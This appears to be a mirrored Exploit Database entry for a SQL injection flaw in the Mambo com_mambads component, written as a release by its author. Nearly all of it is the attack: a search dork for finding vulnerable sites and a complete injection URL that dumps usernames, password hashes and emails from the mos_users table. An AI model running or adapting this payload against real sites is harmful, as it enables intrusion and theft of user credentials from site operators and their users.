Mambo Component MambAds – SQL Injection

• Exploit Database
• 109 阅读

• 作者： Dreadful
  日期： 2010-03-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11719/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

  ============================================================================== [»] Mambo com_mambads Remote Sql Injection Vulnerability ============================================================================== [»] Script: [Joomla] [»] Language: [ PHP ] [»] Founder:[ Dreadful Email:super_crist4l@hotmail.com - Site:sec-war.com/cc> ] [»] Greetz to:[ His0k4sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ] [»] Dork :[ inurl:index.php?option=com_mambads ########################################################################### ===[ Exploit ]=== [»] http://server/index.php?option=com_mambads&Itemid=39&func=view&cacat=33&casb=1+UNION all SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password,0x3a,email),17,18,19,20,21,22,23+from+mos_users-- [»]Author: Dreadful <- ###########################################################################